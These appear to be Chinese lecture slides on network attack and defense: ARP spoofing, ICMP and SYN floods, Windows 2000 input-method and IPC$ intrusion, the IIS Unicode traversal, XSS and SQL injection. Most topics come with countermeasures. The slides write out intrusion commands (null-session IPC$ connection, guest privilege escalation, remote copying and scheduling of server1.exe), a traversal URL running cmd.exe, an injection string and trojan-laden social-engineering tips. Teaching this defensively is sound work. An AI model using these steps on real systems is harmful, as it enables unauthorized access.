第三章 黑客攻防剖析

第三章黑客攻防剖析2内容概要

本章介绍常见的网络协议、以及操作系统、应用漏洞，通过剖析黑客入侵思路和方法，从而给出相应防范策略，以确保我们使用的网络和系统最大限度的安全。本章主要包括以下几部分：黑客攻防概述；常见的漏洞分类；黑客攻击思路、手段以及实现；黑客攻击防范方法3目标在计算机网络日益成为生活中不可或缺的工具时，计算机网络中的安全性已经引起了公众的高度重视。计算机网络的安全威胁来自诸多方面，黑客攻击是重要的威胁来源之一。有效的防范黑客的攻击首先应该做到知己知彼，方可百战不殆。本章将从黑客的起源、黑客的意图、利用的漏洞和攻击手段入手，阐述黑客攻击的原理。4黑客与骇客

今天，人们一谈到“黑客”（Hacker）往往都带着贬斥的意思，但是“黑客”的本来含义却并非如此。一般认为，黑客起源于50年代美国著名高校的实验室中，他们智力非凡、技术高超、精力充沛，热衷于解决一个个棘手的计算机网络难题。60、70年代，“黑客”一词甚至于极富褒义，从事黑客活动意味着对计算机网络的最大潜力进行智力上的自由探索，所谓的“黑客”文化也随之产生了。然而并非所有的人都能恪守“黑客”文化的信条专注于技术的探索，恶意的计算机网络破坏者、信息系统的窃密者随后层出不穷，人们把这部分主观上有恶意企图的人称为“骇客”（Cracker），试图区别于“黑客”，同时也诞生了诸多的黑客分类方法，如“白帽子、黑帽子、灰帽子”。5黑客分类灰帽子破解者破解已有系统发现问题/漏洞突破极限/禁制展现自我计算机为人民服务漏洞发现-Flashsky软件破解-0Day工具提供-Glacier白帽子创新者设计新系统打破常规精研技术勇于创新没有最好，只有更好MS-BillGatesGNU-R.StallmanLinux-Linus善黑帽子破坏者随意使用资源恶意破坏散播蠕虫病毒商业间谍人不为己，天诛地灭入侵者-K.米特尼克CIH-陈盈豪攻击Yahoo者-匿名恶渴求自由黑客分类6黑客攻击分类1.按照TCP/IP协议层分类针对数据链路层的攻击如，ARP欺骗攻击。针对网络层的攻击如，Smurf攻击、IP碎片攻击、ICMP攻击等。针对传输层的攻击如，Teardrop攻击、Land攻击、SYN洪流攻击(SYNFloodAttack)、TCP序列号欺骗攻击等。针对应用层的攻击

DNS欺骗、FTP攻击、SMTP攻击等等。72.按照攻击者目的分类DOS(DenyofService)攻击、DDOS(DistributeDOS)攻击Sniffer监听会话劫持与网络欺骗获取目标主机控制权3.按危害范围分类局域网范围如，sniffer、ARP欺骗等。广域网范围如，DDOS83.3基于协议的攻击TCP/IP协议是网络的基础协议，但协议本身却具有很多的安全漏洞，这是因为TCP/IP协议在设计之初主要是围绕如何共享计算机网络资源而研究的并没有考虑到现在网络上如此多的威胁，虽然对TCP/IP协议的完善和改进从未间断，但漏洞都无可避免。ARP协议漏洞ICMP协议漏洞TCP协议漏洞各种协议明文传输

9安全漏洞产生的原因系统和软件的设计存在缺陷，通信协议不完备；如TCP/IP协议就有很多漏洞。技术实现不充分；如很多缓存溢出方面的漏洞就是在实现时缺少必要的检查。配置管理和使用不当也能产生安全漏洞；如口令过于简单，很容易被黑客猜中。10ARP协议漏洞攻击原理及解决方案ARP协议是“AddressResolutionProtocol”（地址解析协议）的缩写。计算机通过ARP协议将IP地址转换成MAC地址。ARP协议工作原理在以太网中，数据传输的目标地址是MAC地址，一个主机要和另一个主机进行直接通信，必须要知道目标主机的MAC地址。计算机使用者通常只知道目标机器的IP信息，“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。简单地说，ARP协议主要负责将局域网中的32为IP地址转换为对应的48位物理地址，即网卡的MAC地址，保障通信顺畅。

IP:=???我需要知道的物理地址.ARP协议工作原理IP:=???我知道你的请求，这是我的物理地址我需要知道的物理地址.ARP协议工作原理IP:Ethernet:1A-2B-3C-4D-5E-6FIP:=???我知道你的请求，这是我的物理地址我需要知道的物理地址.ARP协议工作原理

什么是ARP欺骗？每个主机都用一个ARP高速缓存存放最近IP地址到MAC地址之间的映射记录。默认情况下，ARP从缓存中读取IP-MAC条目，缓存中的IP-MAC条目是根据ARP响应包动态变化的。只要网络上有ARP响应包发送到本机，即会更新ARP高速缓存中的IP-MAC条目。攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，完成ARP欺骗。

一个简单的案例主机AAA-AA-AA-AA-AA-AA主机CCC-CC-CC-CC-CC-CC主机BBB-BB-BB-BB-BB-BB主机A的ARP缓存表

CC-CC-CC-CC-CC-CCdynamicARP响应包：主机C的MAC地址为BB-BB-BB-BB-BB-BB主机B让主机C宕机，并将IP修改为。

一个简单的案例主机AAA-AA-AA-AA-AA-AA主机CCC-CC-CC-CC-CC-CC主机BBB-BB-BB-BB-BB-BB发给主机C的信息主机A的ARP缓存表

BB-BB-BB-BB-BB-BBdynamic宕机状态

一个简单的案例主机AAA-AA-AA-AA-AA-AA主机CCC-CC-CC-CC-CC-CC主机BBB-BB-BB-BB-BB-BB发给主机C的信息主机A的ARP缓存表CC-CC-CC-CC-CC-CCdynamic主机B通过这种方式可以窃取主机A发送给主机C的信息；为了使过程更加隐蔽，主机B还可以将数据包转发给主机C，从而使主机A和B都不能察觉，这种攻击方式称为ManInTheMiddle－－中间人攻击。中间人攻击经常被用来窃取帐号信息，如传奇木马；还可以在转发数据的时候添加恶意程序。

一个简单的案例主机AAA-AA-AA-AA-AA-AA主机CCC-CC-CC-CC-CC-CC网关BB-BB-BB-BB-BB-BB需要经过网关中转的信息主机A的ARP缓存表

BB-BB-BB-BB-BB-BBdynamic如果把主机C换成网关，会使主机A因为无法找到正确的网关，从而无法访问出去，造成上网中断；同样，主机B可以开启IP转发功能，完成中间人攻击或者在转发的数据中添加恶意程序。同时可以监听整个网段内的数据通信。网关ARP欺骗时的现象网络掉线，但网络连接正常；内网的部分PC机不能上网，或者所有电脑不能上网；无法打开网页或打开网页慢；局域网时断时续并且网速较慢等。

如何快速判断自己被ARP欺骗？出现异常，不能上网的情况下，打开“开始”－“运行”，在CMD窗口中输入“arp–d”，然后重新尝试上网，如果可以上网，说明之前是由于ARP欺骗造成的；

误区：不能上网的机器未必是感染了ARP病毒的机器，而应该是被ARP欺骗的机器。因此在该机器上杀毒是没有意义的。

如何防御ARP欺骗？使用AntiArpSniffer定位ARP攻击源。AntiArpSniffer功能简介：

帮助侦测定位网络中Arp攻击的来源，并保证遭受Arp攻击的网络中的主机在执行该工具的自动保护功能后能正常的与网关通信工具下载地址：AntiArpSniffer使用说明开启AntiARPSniffer,输入网关IP地址，点击［枚取MAC］如你网关填写正确将会显示出网关的MAC地址。AntiArpSniffer使用说明点击[自动保护]即可保护当前网卡与网关的正常通信。AntiArpSniffer使用说明追踪ARP攻击者：

点击［追捕欺骗机］，就能查找到攻击源。1．点击相应的记录2．点击按钮查找攻击源

通过以上方法可以快速发现此类攻击行为，并得知攻击源的MAC地址。这个时候你有两种方法来快速恢复网络。如果你的二层交换机支持单个端口的配置，那么封锁此网卡连接的交换机的端口；否则，你需要通过资产管理资料，找到这台机器的物理位置，拔调此机器的网线。某些网络可能难以通过MAC地址找到机器的物理位置，这个时候需要用一些迂回的方式，比如大家都不能联网的时候，有一台机器可以，那么一般来说这个机器就是攻击源了。通过以上两种方式隔离此机器后，等ARP缓存更新后，其他机器即可正常联网。一般来说MSWindows高速缓存中的每一条记录包括ARP的生存时间一般为60秒。恢复网络方法预防ARP欺骗的几点建议不要把你的网络安全信任关系建立在IP基础上或MAC基础上，理想的关系应该建立在IP+MAC基础上。（arp–s命令）设置静态的MAC-->IP对应表，不要让主机刷新你设定好的转换表。除非很有必要，否则停止使用ARP，将ARP做为永久条目保存在对应表中。使用ARP服务器。通过该服务器查找自己的ARP转换表来响应其他机器的ARP广播。确保这台ARP服务器不被黑。使用硬件屏蔽主机。设置好你的路由，确保IP地址能到达合法的路径。（静态配置路由ARP条目），注意，使用交换集线器和网桥无法阻止ARP欺骗。管理员定期轮询，检查主机上的ARP缓存。28默认情况下，ARP从缓存中读取IP-MAC条目，缓存中的IP-MAC条目是根据ARP响应包动态变化的。因此，只要网络上有ARP响应包发送到本机，即会更新ARP高速缓存中的IP-MAC条目。攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。ICMP协议漏洞攻击与防范ICMP全称InternetControlMessageProtocol(Intemet控制报文协议)，该协议是TCP/IP协议族的一个子协议，属于网络层协议，主要用于在主机与路由器之间传递控制报文。控制报文是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。当遇到IP数据无法访问目标、IP路由器无法按当前的传输速率转发数据包等情况时会自动发送ICMP报文。29ICMP报文类型0：回应应答

3：目的不可达

4：源抑制

5：路由重定向

8：回应请求

11：分组超时14：时间戳应答

17：地址掩码请求

18：地址掩码应答注：ICMP报文封装在IP数据报中。3031ICMP协议漏洞

ICMP的使用者主要是路由器，接收者为IP数据报的源发主机端，但也可以由主机向一个特定的目的主机发出查询报文。ICMP协议有一个特点——它是面向无连接的，也就是说只要发送端完成ICMP报文的封装并传递给路由器，这个报文将会象邮包一样自己去寻找目的地址，这个特点使得ICMP协议非常灵活快捷，但是同时也带来一个致命的缺陷——易伪造，任何人都可以伪造一个ICMP报文并发送出去。基于ICMP协议的攻击PingofDeath

黑客利用操作系统规定的ICMP数据包最大尺寸不超过64KB这一规定，向主机发起“PingofDeath”(死亡之Ping)攻击。“PingofDeath”攻击的原理是：如果ICMP数据包的尺寸超过64KB上限时，主机就会出现内存分配错误，导致TCP/IP堆栈崩溃,致使主机死机。32拒绝服务(DoS)攻击

向目标主机长时间、连续、大量地发送ICMP数据包，也会最终使系统瘫痪。它的工作原理是利用发出ICMP类型8的echo-request给目的主机，对方收到后会发出中断请求给操作系统，请系统回送一个类型0的echo-reply。大量的ICMP数据包会形成“ICMP风暴”或称为“ICMP洪流”，使得目标主机耗费大量的CPU资源处理，疲于奔命。这种攻击被称为拒绝服务（DoS）攻击，它有多种多样具体的实现方式。33Smurf攻击

首先，攻击者会先假冒目的主机(受害者)之名向路由器发出广播的ICMPecho-request数据包。因为目的地是广播地址，路由器在收到之后会对该网段内的所有计算机发出此ICMP数据包，而所有的计算机在接收到此信息后，会对源主机(亦即被假冒的攻击目标)送出ICMPecho-reply响应。如此一来，所有的ICMP数据包在极短的时间内涌入目标主机内，这不但造成网络拥塞，更会使目标主机因为无法反应如此多的系统中断而导致暂停服务。3435Smurf攻击的过程

1.黑客锁定一个被攻击的主机（通常是一些Web服务器）；

2.黑客寻找可做为中间代理的站点，用来对攻击实施放大（通常会选择多个，以便更好地隐藏自己，伪装攻击）；

3.黑客给中间代理站点的广播地址发送大量的ICMP包（主要是指Ping命令的回应包）。这些数据包全都以被攻击的主机的IP地址做为IP包的源地址；

4.中间代理向其所在的子网上的所有主机发送源IP地址欺骗的数据包；

5.中间代理主机对被攻击的网络进行响应。

基于ICMP重定向的路由欺骗

攻击者可利用ICMP重定向报文破坏路由，并以此增强其窃听能力。除了路由器，主机必须服从ICMP重定向。如果一台机器向网络中的另一台机器发送了一个ICMP重定向消息，这就可能引起其他机器具有一张无效的路由表。如果一台机器伪装成路由器截获所有到某些目标网络或全部目标网络的IP数据包，这样就形成了攻击和窃听。3637ICMP转向连接攻击

攻击者使用ICMP“时间超出”或“目标地址无法连接”的消息，致使主机迅速放弃连接。当一台主机错误地认为信息的目标地址不在本地网络中时，网关通常会使用ICMP“转向”消息。如果攻击者伪造出一条“转向”消息，它就可以导致另一台主机经过攻击者主机向特定连接发送数据包。38ICMP攻击防范措施1.在路由器或主机端拒绝所有的ICMP包(对于Smuff攻击：可在路由器禁止IP广播)；2.在该网段路由器对ICMP包进行带宽限制(或限制ICMP包的数量)，控制其在一定的范围内。3.将主机配置成不处理ICMP重定向消息，或者路由器之间一定要经过安全认证。39TCP协议漏洞攻击TCP协议连接基本原理：TCP与UDP不同，它是基于连接的，也就是说：为了在服务端和客户端之间传送TCP数据，必须先建立一个虚拟电路，也就是TCP连接，建立TCP连接的标准过程是这样的：首先，请求端（客户端）发送一个包含SYN标志的TCP报文，SYN即同步（Synchronize），同步报文会指明客户端使用的端口以及TCP连接的初始序号（半连接）；第二步，服务器在收到客户端的SYN报文后，将返回一个SYN+ACK的报文，表示客户端的请求被接受，同时TCP序号被加一，ACK即确认（Acknowledgement）。第三步，客户端也返回一个确认报文ACK给服务器端，同样TCP序列号被加一，到此一个TCP连接完成（全连接）。以上的连接过程在TCP协议中被称为三次握手（Three-wayHandshake）（如下图）。40TCP的“三次握手”41SYNFLOOD是一种比较常见的DoS攻击手段，它的特点就是防不胜防。它利用TCP协议缺陷，通过发送大量的半连接请求，耗费CPU和内存资源。SYN攻击除了能影响主机外，还可以危害路由器、防火墙等网络系统，事实上SYN攻击并不管目标是什么系统，只要这些系统打开TCP服务就可以实施。SYNFLOOD攻击下一个ACK342假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的（第三次握手无法完成），这种情况下服务器端一般会重试（再次发送SYN+ACK给客户端）并等待一段时间后丢弃这个未完成的连接，这段时间的长度我们称为SYNTimeout，一般来说这个时间是分钟的数量级（大约为30秒-2分钟）；SYNFLOOD攻击原理43一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题，但如果有一个恶意的攻击者大量模拟这种情况，服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源数以万计的半连接，即使是简单的保存并遍历也会消耗非常多的CPU时间和内存，何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大，最后的结果往往是堆栈溢出崩溃即使服务器端的系统足够强大，服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求（毕竟客户端的正常请求比率非常之小），此时从正常客户的角度看来，服务器失去响应，这种情况我们称作：服务器端受到了SYNFlood攻击（SYN洪水攻击）。SYNFLOOD攻击原理44如何防御SYNFLOOD攻击第一种是缩短SYNTimeout时间，由于SYNFlood攻击的效果取决于服务器上保持的SYN半连接数，这个值=SYN攻击的频度xSYNTimeout，所以通过缩短从接收到SYN报文到确定这个报文无效并丢弃改连接的时间，例如设置为20秒以下（过低的SYNTimeout设置可能会影响客户的正常访问），可以成倍的降低服务器的负荷。第二种方法是设置SYNCookie，就是给每一个请求连接的IP地址分配一个Cookie，如果短时间内连续受到某个IP的重复SYN报文，就认定是受到了攻击，以后从这个IP地址来的包会被丢弃。45协议明文漏洞攻击各种协议明文传输产生原因：如Telnet、Http、Pop、FTP等相关协议都是明文传输，很容易被嗅探侦听攻击实现：1。网络控制设备侦听2。内部网抓包工具HTTPSniffer、SpyNet、Sniffit、Ettercap、Snarp防范措施：加密措施，VPN,SSL,s,应用加密46操作系统漏洞输入法漏洞IPC$攻击IIS下漏洞攻击漏洞举例47基于3389端口结合输入法漏洞入侵1.漏洞介绍：由于MicrosoftWindows2000Server在安装服务器时，其中有一项是超级终端服务。该服务所开放的端口号为3389，是微软为了方便用户远程管理而设。但是中文Windows2000存在有输入漏洞，其漏洞就是用户在登录Windows2000时，利用输入法的帮助文件可以获得Administrators组权限。2.受影响系统：输入法漏洞存在于MicrosoftWindows2000所有中文版本。3.入侵测试所用工具：由于Windows2000Server终端服务程序的局限性，所以使用第三方软件。软件名程：酷虎Win2K登录器。软件大小：251KB操作平台：Windows9x/WindowsME/Windows2000/WindowsXP6.2.1

通过输入法漏洞实现简单的入侵。48基于3389端口结合输入法漏洞入侵4.操作步骤(1)测试服务器IP地址：(2)打开酷虎Win2K登录器程序，输入目标机IP地址，单击【连接】按钮，如图1所示。

图1酷虎Win2K登录器界面49(3)连接成功后，将会出现Windows2000登录界面，此时将光标放至【用户名】文本框中，如图2所示。图2光标放至用户名文本框中基于3389端口结合输入法漏洞入侵50(4)然后按Ctrl+shift快捷键调出全拼输入法状态。(5)将鼠标指针移到微软标志处单击右键，便弹出一个关于全拼输入法的快捷菜单，如图3所示。图3显示输入法信息基于3389端口结合输入法漏洞入侵51(6)选择【帮助】→【操作指南】命令，如图4所示。图4输入法信息基于3389端口结合输入法漏洞入侵52(7)打开【输入法操作指南】窗口，在基本操作目录下选择一项帮助目录后，单击鼠标右键，从弹出的快捷菜单中选择【跳至URL】命令，如图5所示。图5【输入法操作指南】窗口基于3389端口结合输入法漏洞入侵53基于3389端口结合输入法漏洞入侵(8)在【跳至URL】的【跳至该URL】中输入【e:\】，单击【确定】按钮，如图6所示。图6设置【跳至URL】对话框54基于3389端口结合输入法漏洞入侵(9)此时可以列出E盘中的文件夹，如图7所示。图7列出E盘目录注：也可以在【跳至URL】中输入C:\、D:\等，可以列出目标服务器目录，同时还具有对每一个文件的完全控制权限。55防范措施：1.给Windows2000打补丁到SP4（如打补丁到SP2,可不需要进行第2项操作）2.删除输入法帮助文件和多余的输入法。

基于3389端口结合输入法漏洞入侵56IPC$攻击IPC$(Internet

Process

Connection)是共享“命名管道”的资源，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

WindowsNT及Windows2k/xp/2003在刚安装后，所有逻辑分区被默认共享，它们分别为C$、D$、E$T和ADMIN$，其中$表示共享是隐藏的。57利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。58ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登录功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$)和系统目录winnt或WINDOWS(admin$)。

ipc$是为了方便管理员的管理,一些别有用心者会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。59IPC连接是Windows

NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows

NT中的很多DLL函数，所以不能在中运行。

只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的。60即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接。并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表。61

ipc$与空连接,139,445端口,默认共享的关系

ipc$与空连接:

不需要用户名与密码的ipc$连接即为空连接。一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了。62

ipc$与139,445端口:

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139、445(win2000)端口实现对共享文件/打印机的访问。因此一般来讲,ipc$连接是需要139或445端口来支持的。63ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$)和系统目录winnt或WINDOWS(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

。64

ipc$连接失败的原因

以下5个原因是比较常见的:

1)你的系统不是NT或以上操作系统;

2)对方没有打开ipc$默认共享

3)对方未开启139或445端口(或被防火墙屏蔽)

4)你的命令输入有误(比如缺少了空格等)

5)用户名或密码错误(空连接当然无所谓了)65IPC$入侵中常用DOS命令集合netshareabc$=c:\将c:盘映射为abc$(加了“$”之后为隐藏的共享目录)netsharec$/del禁止C$共享netusez:\\*.*.*.*\C$把*.*.*.*(IP)的共享C$映射为本地的Z：盘netusec:/del删除映射的c盘netuse*/del/y删除全部netstart显示本地主机当前服务netstarttelnet启动Telnet服务netstartServer启动Server服务(IPC$和共享要*这个服务)66IPC$入侵中常用DOS命令集合netstopMessenger停止信使服务(不会在有烦人的Win的弹出广告了)!netstopserver停止Server服务(关了这服务,远程的机子就不能查看你的共享和用IPC$入侵)netuser得到本地主机的用户列表netuserguest/active:yes将停用的guest帐号激活(变为可用)67IPC$入侵中常用DOS命令集合netuserguest888888把Guest帐号的密码改为888888netlocalgroupAdministratorsguest/add把Guest加到Administrators组中(这样你就有了超级权限了)netview\\*.*.*.*查看指定IP主机上的共享nbtstat-A*.*.*.*得到远程主机的NetBIOS用户名列表68IPC$入侵中常用DOS命令集合netshare查看本地主机的共享资源(本地的默认共享也可以看到)netuse\\*.*.*.*\ipc$""/user:""建立空连接telnet*.*.*.*90连接对方机子的telnet,端口为90ipconfig查看本机的IP信息69IPC$入侵中常用DOS命令集合IPC入侵过程序命令（实例演示）netuse\\*.*.*.*\ipc$""/user:"Administrator"建立用户名为Administrator密码为空的连接copyserver1.exe\\*.*.*.*\Admin$\system32即将当前目录下的复制到对方Admin$共享的System32目录内nettime\\*.*.*.*查看远程主机的当前时间at\\*.*.*.*14:00server1.exe在对方机子添加一个在14:00运行server1.exe的任务70IPC入侵防范方法禁止空连接进行枚举禁止默认共享永久关闭IPC$服务安装防火墙设置复杂密码7172IIS中的UNICODE漏洞攻击什么是IIS?IIS是InternetInformationServices的缩写，是一个WorldWideWebserver。IIS意味着你能发布网页，并且有ASP、JAVA、VBscript产生页面，有着一些扩展功能。IIS（InternetInformationServer，互联网信息服务）是一种Web（网页）服务组件，其中包括Web服务器、FTP服务器、NNTP服务器和SMTP服务器，分别用于网页浏览、文件传输、新闻服务和邮件发送等方面，它使得在网络（包括互联网和局域网）上发布信息成了一件很容易的事。IIS中的UNICODE漏洞攻击什么是Unicode?Unicode（统一码、万国码、单一码）是一种在计算机上使用的字符编码。它为每种语言中的每个字符设定了统一并且唯一的二进制编码，以满足跨语言、跨平台进行文本转换、处理的要求。1990年开始研发，1994年正式公布。随着计算机工作能力的增强，Unicode也在面世以来的十多年里得到普及。73IIS中的UNICODE漏洞攻击IIS有十多种常见漏洞，但利用得最多的莫过于Unicode解析错误漏洞。微软在Unicode字符解码的实现中存在一个安全漏洞，用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含Unicode字符，它会对它进行解码。如果用户提供一些特殊的编码，将导致IIS错误地打开或者执行某些Web根目录以外的文件或程序。通过此漏洞，攻击者可查看文件内容、建立文件夹、删除文件、拷贝文件且改名、显示目标主机当前的环境变量、把某个文件夹内的全部文件一次性拷贝到另外的文件夹去、把某个文件夹移动到指定的目录和显示某一路径下相同文件类型的文件内容等。7475当IIS收到的URL请求的文件名中包含一个特殊的编码例如"%c1%hh"或者"%c0%hh"它会首先将其解码变成:0xc10xhh，然后尝试打开这个文件，Windows系统认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果0x00<=%hh<0x40的话，采用的解码的格式与下面的格式类似：

%c1%hh->(0xc1-0xc0)*0x40+0xhh

%c0%hh->(0xc0-0xc0)*0x40+0xhh76利用这种编码，我们可以构造很多字符，例如:%c1%1c='/'%c0%2f='\'攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能列出当前目录的内容://example/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\77Web应用漏洞-Cookie攻击众所周知，浏览网页时网页程序会在你的硬盘上创建一个Cookie文本文件，在XP的C:\Documents

and

Settings\XP登录用户名\Cookie目录下，你可以看到这些Cookie文件，格式为：XP用户名@网站地址[数字].txt。什么是Cookie？

为了方便用户浏览、准确收集访问者信息，很多网站都采用了Cookie技术。Cookie文件中存放了一些明文或者MD5加密信息，比如用户ID、密码、停留时间等，如果网站在你的硬盘上创建了Cookie，以后再次访问该站时，网站就会读取该Cookie然后做出相应的动作，例如不输入用户ID、密码直接登录，进行身份和权限验证等。78Cookie分成持久Cookie和会话Cookie（session

Cookie）两种类型。前者保存在你的电脑硬盘中（通常是加密的），例如你首次访问某站时，服务器会在数据库中新建一个唯一的ID，并把该ID记录在持久Cookie中传送给你；以后再次来访时，服务器会读取该Cookie，判断你是否为老用户，或者计算访问次数等操作。持久Cookie可能会遭到Cookie欺骗及针对Cookie的跨站脚本攻击，不如session

Cookie安全。

会话Cookie位于服务器端、保存在内存（浏览器进程）中，当你浏览某网页时创建，关闭此页即删除。例如这样一个会话Cookie：首次登录网站时，服务器会验证你的授权证书创建一个会话Cookie，在不关闭浏览器的情况下、如果你再次访问该站，服务器就会读取该会话Cookie验证你是谁，验证通过后，服务器将返回你请求的页面，否则你就得重新登录，一旦登出该站，会话Cookie即被删除，你的会员权限也将随之终止。Web应用漏洞-Cookie攻击79

要查看Cookie，你可以启动IE，点击菜单“工具”→“Internet选项”，在“常规”选项卡中点“设置”→“查看文件”，即可看到你硬盘中所有的Cookie文件，这些TXT文件通常以<XP用户名>@domain格式命名，domain是你访问过的网站域名。

此外，你也可以使用IECookieView来查看、修改删除或保存Cookie文件。如图：Page50。你可以发现一些个人隐私，例如网站的登录用户名、密码等。而本地Cookie容易被黑客远程读取，如用户在某论坛看主题或者打开网页时，其本地Cookie就有可能被远程黑客所提取。

为此，建议你在公共场所上网后，要运行IECookieView，点击菜单“DestroyAllExceptTheSelectedCookies”删除全部Cookie文件，以免帐号、密码等隐私信息外泄。Web应用漏洞-Cookie攻击80Web应用漏洞-跨站攻击跨站脚本是近年来最为流行的网络攻击方式之一，已经占到了网络攻击相当大的比例，众多网站，如著名的Facebook等都遭遇过此类攻击。国内知名的新浪微博最近遭遇的网络病毒实际上也是跨站脚本漏洞所导致的。跨站脚本起初的危害主要是盗取用户的Cookie信息。Cookie信息中包含了浏览者和网站服务器之间的常用记录，包括登录记录、浏览记录等。如果攻击者得到了用户的Cookie信息，可以模仿用户和网站进行交互，得到更多想要的数据。例如，攻击者在某论坛上发布一个URL链接，当用户点击该链接后，用户的浏览器就会将Cookie信息发送到攻击者的网站。攻击者收集到Cookie信息后可以以浏览者身份访问网站、进入邮箱等，继续窃取私人信息。81跨站脚本原理跨站脚本简称为CSS（CrossSiteScripting），因为容易和另一个名词“层叠样式表”（CascadingStyleSheets，CSS）混淆，为了区别，网络安全人士习惯将其简称为XSS攻击。从本质上看，跨站脚本实际上是一种恶意代码执行的方式。主要原因在于网站对于用户提交的数据过滤不严格，直接把html标签、SQL语句提交到数据库并在返回页面显示和执行，这样黑客可以利用跨站漏洞输入恶意脚本代码，导致问题产生。从攻击方式上来看，跨站脚本主要分为两大类，一类是反射型的跨站脚本，一类是存储型的跨站脚本。82反射型的跨站脚本注：从图中可以看出，在这种攻击过程中，数据在用户浏览器和网站之间进行了一个“来回”交互，因此这种方式被称为反射型的跨站脚本。83存储型的跨站脚本84跨站攻击的防御方式基于行为特征分析的防御方式85Web应用漏洞-SQL注入攻击四、Sql注入攻击(网络上存在最多，利用最广泛的漏洞）A.实例注入攻击CMSware网站(Demo)1.测试注入点2.分析出错，构造语句WHEREu.uName=''and1=1--'andu.uPass='a31983fe1a3f1ebc65f1a4916b8a9bd7‘B.专业注入工具(Demo)注入工具有NBSI、啊D、Domain等，我们以domain为例介绍86黑客入侵思路信息收集漏洞扫描漏洞利用攻击阶段后攻击阶段黑客攻击步骤87黑客黑客攻击一般步骤信息收集 从一些社会信息入手：找到网络地址范围找到关键的机器地址找到开放端口和入口点找到系统的制造商和版本A社会工程学:1。通过一些公开的信息，如办公室号码、管理员生日、姓、家庭。2。如果以上尝试失败，可能会通过各种途径获得管理员以及内部人员的信任，例如网络聊天，然后发送加壳木马软件或者键盘记录工具。3．如果管理员已经系统打了补丁，MS04-028漏洞无法利用。通过协助其解决技术问题，帮助其测试软件，交朋友等名义，能够直接有机会进入网络机房。用Lc4工具直接破SAM库(DEMO)B技术手段信息收集:Whois/DNS/Ping&Traceroute

88黑客攻击一般步骤漏洞扫描 知道基本IP网段、服务器系统等信息之后，可以针对性的扫描。 扫描工具： 扫描软件有SSS（ShadowSecurityScanner），Nmap、Xsan、Superscan,以及国产流光等。 扫描目的： 通过扫描得到开放的端口，通过端口判断主机开放哪些服务，并且扫出漏洞可利用之处。漏洞利用 1。有些扫描软件自带利用工具，如流光等。 2。有些不带，如SSS,根据扫描结果描述，到搜索Google,Baidu或者一些黑客